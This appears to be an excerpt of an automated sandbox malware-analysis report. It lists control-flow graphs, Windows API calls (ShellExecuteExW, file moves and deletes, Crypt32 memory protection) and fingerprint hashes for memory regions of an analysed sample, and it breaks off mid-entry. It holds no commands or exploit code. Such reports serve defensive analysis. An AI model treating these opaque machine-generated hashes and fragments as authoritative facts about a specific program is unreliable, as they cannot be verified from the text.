                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                                            • String ID: \
                                                                                                                                                                            • API String ID: 3569833718-2967466578
                                                                                                                                                                            • Opcode ID: 76b16a3c5e1aa87d11103be972b44c7da299b051a3e32a2915e0d57e9a992619
                                                                                                                                                                            • Instruction ID: dd26664ed97007d09170d767388a0fa183d9c3e38f3bee9ba7c5ec84685d3af3
                                                                                                                                                                            • Opcode Fuzzy Hash: 76b16a3c5e1aa87d11103be972b44c7da299b051a3e32a2915e0d57e9a992619
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E2106712457847AE322FB259C41FAF7B9CEF82754F000618F690961C1C7AA59058BB7

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 611 fec431-fec449 call fed940 614 fec44f-fec45b call ff2b33 611->614 615 fec695-fec69d 611->615 614->615 618 fec461-fec489 call fee920 614->618 621 fec48b 618->621 622 fec493-fec4a0 618->622 621->622 623 fec4a4-fec4ad 622->623 624 fec4a2 622->624 625 fec4af-fec4b1 623->625 626 fec4e5 623->626 624->623 627 fec4b9-fec4bc 625->627 628 fec4e9-fec4eb 626->628 629 fec649-fec64e 627->629 630 fec4c2-fec4ca 627->630 631 fec4ed-fec4f0 628->631 632 fec4f2-fec4f4 628->632 635 fec643-fec647 629->635 636 fec650 629->636 637 fec662-fec66a 630->637 638 fec4d0-fec4d6 630->638 631->632 634 fec507-fec519 call fdb153 631->634 633 fec4f6-fec4fd 632->633 632->634 633->634 639 fec4ff 633->639 646 fec51b-fec528 call fe1410 634->646 647 fec532-fec53d call fd9e6b 634->647 635->629 641 fec655-fec659 635->641 636->641 643 fec66c-fec66e 637->643 644 fec672-fec67a 637->644 638->637 642 fec4dc-fec4e3 638->642 639->634 641->637 642->626 642->627 643->644 644->628 646->647 652 fec52a 646->652 653 fec53f-fec556 call fdaed7 647->653 654 fec55a-fec567 ShellExecuteExW 647->654 652->647 653->654 655 fec56d-fec580 654->655 656 fec693-fec694 654->656 658 fec582-fec589 655->658 659 fec593-fec595 655->659 656->615 658->659 661 fec58b-fec591 658->661 662 fec5a8-fec5c7 WaitForInputIdle call fec8f0 659->662 663 fec597-fec5a0 IsWindowVisible 659->663 661->659 664 fec5fe-fec60a CloseHandle 661->664 662->664 673 fec5c9-fec5d1 662->673 663->662 665 fec5a2-fec5a6 ShowWindow 663->665 668 fec60c-fec619 call fe1410 664->668 669 fec61b-fec629 664->669 665->662 668->669 678 fec67f 668->678 671 fec62b-fec62d 669->671 672 fec686-fec688 669->672 671->672 676 fec62f-fec635 671->676 672->656 675 fec68a-fec68c 672->675 673->664 677 fec5d3-fec5e4 GetExitCodeProcess 673->677 675->656 679 fec68e-fec691 ShowWindow 675->679 676->672 680 fec637-fec641 676->680 677->664 681 fec5e6-fec5f0 677->681 678->672 679->656 680->672 682 fec5f7 681->682 683 fec5f2 681->683 682->664 683->682
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShellExecuteExW.SHELL32(000001C0), ref: 00FEC55F
                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00FEC598
                                                                                                                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00FEC5A4
                                                                                                                                                                            • WaitForInputIdle.USER32(?,000007D0), ref: 00FEC5B1
                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00FEC5DC
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEC602
                                                                                                                                                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00FEC691
                                                                                                                                                                              • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
                                                                                                                                                                            • String ID: $.exe$.inf
                                                                                                                                                                            • API String ID: 1693144567-2452507128
                                                                                                                                                                            • Opcode ID: 8e6642419ddb53cfd78501e8c1cd55cadd81abec371586d523f53655ada25618
                                                                                                                                                                            • Instruction ID: 0cc7143ac2c839407e3fe949de70c23fdff02f6ca96dcf164aa33a6ea497ad9a
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e6642419ddb53cfd78501e8c1cd55cadd81abec371586d523f53655ada25618
                                                                                                                                                                            • Instruction Fuzzy Hash: BE5134318043C09ADB31EF66D804A7BB7E8AF84314F08081DF5C597291D7BA9D46EBD2

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 684 ff95a5-ff95be 685 ff95d4-ff95d9 684->685 686 ff95c0-ff95d0 call ffdbbc 684->686 688 ff95db-ff95e3 685->688 689 ff95e6-ff960a MultiByteToWideChar 685->689 686->685 696 ff95d2 686->696 688->689 690 ff979d-ff97b0 call fee203 689->690 691 ff9610-ff961c 689->691 693 ff961e-ff962f 691->693 694 ff9670 691->694 697 ff964e-ff965f call ff7a8a 693->697 698 ff9631-ff9640 call 1000ee0 693->698 700 ff9672-ff9674 694->700 696->685 704 ff9792 697->704 712 ff9665 697->712 698->704 711 ff9646-ff964c 698->711 703 ff967a-ff968d MultiByteToWideChar 700->703 700->704 703->704 708 ff9693-ff96a5 call ff9c64 703->708 705 ff9794-ff979b call ff980d 704->705 705->690 713 ff96aa-ff96ae 708->713 715 ff966b-ff966e 711->715 712->715 713->704 716 ff96b4-ff96bb 713->716 715->700 717 ff96bd-ff96c2 716->717 718 ff96f5-ff9701 716->718 717->705 719 ff96c8-ff96ca 717->719 720 ff974d 718->720 721 ff9703-ff9714 718->721 719->704 722 ff96d0-ff96ea call ff9c64 719->722 723 ff974f-ff9751 720->723 724 ff972f-ff9740 call ff7a8a 721->724 725 ff9716-ff9725 call 1000ee0 721->725 722->705 737 ff96f0 722->737 728 ff978b-ff9791 call ff980d 723->728 729 ff9753-ff976c call ff9c64 723->729 724->728 736 ff9742 724->736 725->728 740 ff9727-ff972d 725->740 728->704 729->728 742 ff976e-ff9775 729->742 741 ff9748-ff974b 736->741 737->704 740->741 741->723 743 ff9777-ff9778 742->743 744 ff97b1-ff97b7 742->744 745 ff9779-ff9789 WideCharToMultiByte 743->745 744->745 745->728 746 ff97b9-ff97c0 call ff980d 745->746 746->705
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FF451B,00FF451B,?,?,?,00FF97F6,00000001,00000001,31E85006), ref: 00FF95FF
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FF97F6,00000001,00000001,31E85006,?,?,?), ref: 00FF9685
                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FF977F
                                                                                                                                                                            • __freea.LIBCMT ref: 00FF978C
                                                                                                                                                                              • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
                                                                                                                                                                            • __freea.LIBCMT ref: 00FF9795
                                                                                                                                                                            • __freea.LIBCMT ref: 00FF97BA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                            • String ID: 6P+
                                                                                                                                                                            • API String ID: 1414292761-3080146196
                                                                                                                                                                            • Opcode ID: 8a88c9c9b0456ffafb2e20846c489e39cc32f58da3734962a5509f7d742d6323
                                                                                                                                                                            • Instruction ID: 8e700e8dbcc6f4f05202663ca37db5ce306e1dc87918c56e56fde23dde2d64bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 8a88c9c9b0456ffafb2e20846c489e39cc32f58da3734962a5509f7d742d6323
                                                                                                                                                                            • Instruction Fuzzy Hash: 1151D873A1431AABDB25AE64CC81FBF77A9EF40760F154628FE05D6160EBB4DC40E690

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 749 febb5b-febb5e 750 febcdf-febce2 749->750 751 febb64-febb89 GetTempPathW call fdaea5 749->751 753 febce8-febcef 750->753 754 fec093-fec0be call fea156 750->754 760 febb8d-febbb9 call fd3e41 call fd9e6b 751->760 757 febcfb-febd02 753->757 758 febcf1 753->758 761 feb51b-feb529 754->761 762 fec0c4-fec0d4 754->762 757->754 758->757 772 febb8b-febb8c 760->772 773 febbbb-febbd3 SetDlgItemTextW 760->773 766 feb52a-feb53a call fe9e24 761->766 771 feb53c 766->771 775 feb53e-feb553 call fe1410 771->775 772->760 773->754 774 febbd9-febbe0 773->774 774->754 776 febbe6-febc01 call ff0bb8 774->776 781 feb555-feb559 775->781 782 feb560-feb563 775->782 783 febc55-febc5d 776->783 784 febc03-febc0e 776->784 781->775 785 feb55b 781->785 782->754 786 feb569 782->786 792 febc8f-febcbf call fe9c4f call fe9735 783->792 793 febc5f-febc8a call fdfab1 * 2 783->793 784->783 787 febc10-febc12 784->787 785->754 788 feb75f-feb761 786->788 789 feb81d-feb81f 786->789 790 feb570-feb573 786->790 791 feb800-feb802 786->791 795 febc18-febc1c 787->795 788->754 799 feb767-feb773 788->799 789->754 797 feb825-feb82c 789->797 790->754 798 feb579-feb5e6 call fe95f8 call fdb625 call fda188 call fda2c2 call fd6ef9 call fda215 790->798 791->754 796 feb808-feb818 SetWindowTextW 791->796 792->754 829 febcc5-febcd9 EndDialog 792->829 793->792 802 febc1e-febc2d 795->802 803 febc31-febc4d call fdfab1 795->803 796->754 797->754 804 feb832-feb84b 797->804 877 feb5ec-feb5f2 798->877 878 feb74b-feb75a call fda19e 798->878 806 feb787-feb78c 799->806 807 feb775-feb786 call ff66ed 799->807 802->795 813 febc2f 802->813 803->783 815 feb84d 804->815 816 feb853-feb861 call ff2b33 804->816 810 feb78e-feb794 806->810 811 feb796-feb7a1 call fea2ae 806->811 807->806 819 feb7a6-feb7a8 810->819 811->819 813->783 815->816 816->754 832 feb867-feb870 816->832 827 feb7aa-feb7b1 call ff2b33 819->827 828 feb7b3-feb7d3 call ff2b33 call ff2b5e 819->828 827->828 855 feb7ec-feb7ee 828->855 856 feb7d5-feb7dc 828->856 829->750 837 feb899-feb89c 832->837 838 feb872-feb876 832->838 843 feb8a2-feb8a5 837->843 844 feb981-feb98f call fdfab1 837->844 838->837 842 feb878-feb880 838->842 842->754 848 feb886-feb894 call fdfab1 842->848 849 feb8a7-feb8ac 843->849 850 feb8b2-feb8cd 843->850 858 feb991-feb9a5 call ff0d9b 844->858 848->858 849->844 849->850 868 feb8cf-feb909 850->868 869 feb917-feb91e 850->869 855->754 859 feb7f4-feb7fb call ff2b4e 855->859 862 feb7de-feb7e0 856->862 863 feb7e3-feb7eb call ff66ed 856->863 879 feb9a7-feb9ab 858->879 880 feb9b2-feba0e call fdfab1 call fe9ffc GetDlgItem SetWindowTextW SendMessageW call ff2b69 858->880 859->754 862->863 863->855 896 feb90d-feb90f 868->896 897 feb90b 868->897 871 feb94c-feb96f call ff2b33 * 2 869->871 872 feb920-feb938 call ff2b33 869->872 871->858 908 feb971-feb97f call fdfa89 871->908 872->871 890 feb93a-feb947 call fdfa89 872->890 884 feb5f9-feb60e SetFileAttributesW 877->884 878->754 879->880 885 feb9ad-feb9af 879->885 880->754 919 feba14-feba26 SendMessageW 880->919 891 feb6b4-feb6c0 GetFileAttributesW 884->891 892 feb614-feb647 call fdb1b7 call fdaea5 call ff2b33 884->892 885->880 890->871 901 feb6c2-feb6d1 DeleteFileW 891->901 902 feb730-feb745 call fda215 891->902 925 feb65a-feb668 call fdb5e5 892->925 926 feb649-feb658 call ff2b33 892->926 896->869 897->896 901->902 907 feb6d3-feb6d6 901->907 902->878 916 feb5f4 902->916 912 feb6da-feb706 call fd3e41 GetFileAttributesW 907->912 908->858 923 feb6d8-feb6d9 912->923 924 feb708-feb71e MoveFileW 912->924 916->884 919->754 923->912 924->902 927 feb720-feb72a MoveFileExW 924->927 925->878 932 feb66e-feb6ae call ff2b33 call fee920 SHFileOperationW 925->932 926->925 926->932 927->902 932->891
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00FEBB71
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FEBBA5
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000066,010185FA), ref: 00FEBBC5
                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00FEBBF8
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FEBCD9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                                                                            • String ID: %s%s%u
                                                                                                                                                                            • API String ID: 2892007947-1360425832
                                                                                                                                                                            • Opcode ID: 5b3b5b5916fa0c5faf502b17c09399cf304be07c4ee4ed2d1df7ba1445055190
                                                                                                                                                                            • Instruction ID: a056ade0322e63b3e756c30454fa360744e61c1950f5ba1dc9f088fdd3a96a60
                                                                                                                                                                            • Opcode Fuzzy Hash: 5b3b5b5916fa0c5faf502b17c09399cf304be07c4ee4ed2d1df7ba1445055190
                                                                                                                                                                            • Instruction Fuzzy Hash: BC419E72D04259AEEF25DBA5CC85FEE77B8EB04314F0040A6F509E6150EF799B849F60

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FDFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
                                                                                                                                                                              • Part of subcall function 00FDFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00FE9AB9
                                                                                                                                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FE9AF0
                                                                                                                                                                            • SHGetMalloc.SHELL32(010175C0), ref: 00FE9AFA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                                                                            • String ID: riched20.dll$3Ro
                                                                                                                                                                            • API String ID: 3498096277-3613677438
                                                                                                                                                                            • Opcode ID: 397dc81b39bc76cd90400c707cbf8807e326704b4bd123ce3b8485e07c12590c
                                                                                                                                                                            • Instruction ID: 0ecc9b62dcb17eb4b2559102f767afa6ba581914d1439a02b3bb125c905a0b30
                                                                                                                                                                            • Opcode Fuzzy Hash: 397dc81b39bc76cd90400c707cbf8807e326704b4bd123ce3b8485e07c12590c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5BF04471C0010DABC711AFDAD8459EFFFFCEF44310F00415AE854A2245D7B816058BA1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 941 fde7e3-fde7ea 942 fde7ec-fde7fa call fdfcfd 941->942 943 fde81f-fde820 941->943 946 fde7fc-fde818 GetProcAddress * 2 942->946 947 fde81b 942->947 946->947 947->943
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FDFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
                                                                                                                                                                              • Part of subcall function 00FDFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FDE802
                                                                                                                                                                            • GetProcAddress.KERNEL32(01017350,CryptUnprotectMemory), ref: 00FDE812
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                            • API String ID: 2141747552-1753850145
                                                                                                                                                                            • Opcode ID: e0cc746473fc2524aa6e37c01c22966f87535aa154cf89a9cf18d3fb2e96103a
                                                                                                                                                                            • Instruction ID: 71dd59361d70f27cc1e65eac5ae573b51c4191ce9473f10ef2b78c1ae462305f
                                                                                                                                                                            • Opcode Fuzzy Hash: e0cc746473fc2524aa6e37c01c22966f87535aa154cf89a9cf18d3fb2e96103a
                                                                                                                                                                            • Instruction Fuzzy Hash: C5E04FB1901743AAEB126B35DC0CA01FBA56F14710F14C12BB494D7245DBB8D060DB60

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 948 fd9768-fd9789 call fed940 951 fd978b-fd978e 948->951 952 fd9794 948->952 951->952 953 fd9790-fd9792 951->953 954 fd9796-fd97b3 952->954 953->954 955 fd97bb-fd97c5 954->955 956 fd97b5 954->956 957 fd97ca-fd97e9 call fd6ef9 955->957 958 fd97c7 955->958 956->955 961 fd97eb 957->961 962 fd97f1-fd980f CreateFileW 957->962 958->957 961->962 963 fd9811-fd9833 GetLastError call fdb32c 962->963 964 fd9873-fd9878 962->964 972 fd9835-fd9857 CreateFileW GetLastError 963->972 973 fd9862-fd9867 963->973 965 fd9899-fd98ad 964->965 966 fd987a-fd987d 964->966 969 fd98af-fd98c2 call fdfab1 965->969 970 fd98c7-fd98d2 965->970 966->965 968 fd987f-fd9893 SetFileTime 966->968 968->965 969->970 975 fd985d-fd9860 972->975 976 fd9859 972->976 973->964 977 fd9869 973->977 975->964 975->973 976->975 977->964
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00FD76F2,?,00000005,?,00000011), ref: 00FD9804
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00FD76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD9811
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00FD76F2,?,00000005,?), ref: 00FD9846
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00FD76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD984E
                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00FD76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FD9893
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CreateErrorLast$Time
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1999340476-0
                                                                                                                                                                            • Opcode ID: 140bb8fe4dcf5c6c6b812be88b73d646c06ce225c575d3d7c895fbaf6b4b2179
                                                                                                                                                                            • Instruction ID: 0fcb4e1b6345bd93759ad1b49bff8c72cb1953c1160f99be23fb4e9175f9a6e7
                                                                                                                                                                            • Opcode Fuzzy Hash: 140bb8fe4dcf5c6c6b812be88b73d646c06ce225c575d3d7c895fbaf6b4b2179
                                                                                                                                                                            • Instruction Fuzzy Hash: 1D413B319487466BE320DF60CC09BDABBD6FB01734F18071AF5E0962C1D3B99888EB91

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1006 fea388-fea3a1 PeekMessageW 1007 fea3dc-fea3e0 1006->1007 1008 fea3a3-fea3b7 GetMessageW 1006->1008 1009 fea3c8-fea3d6 TranslateMessage DispatchMessageW 1008->1009 1010 fea3b9-fea3c6 IsDialogMessageW 1008->1010 1009->1007 1010->1007 1010->1009
                                                                                                                                                                            APIs
                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FEA399
                                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FEA3AA
                                                                                                                                                                            • IsDialogMessageW.USER32(000304CA,?), ref: 00FEA3BE
                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00FEA3CC
                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00FEA3D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1266772231-0
                                                                                                                                                                            • Opcode ID: 30469f34f7008206d2acd611bc528ea78b40b076c528cad3307d234b585b4bef
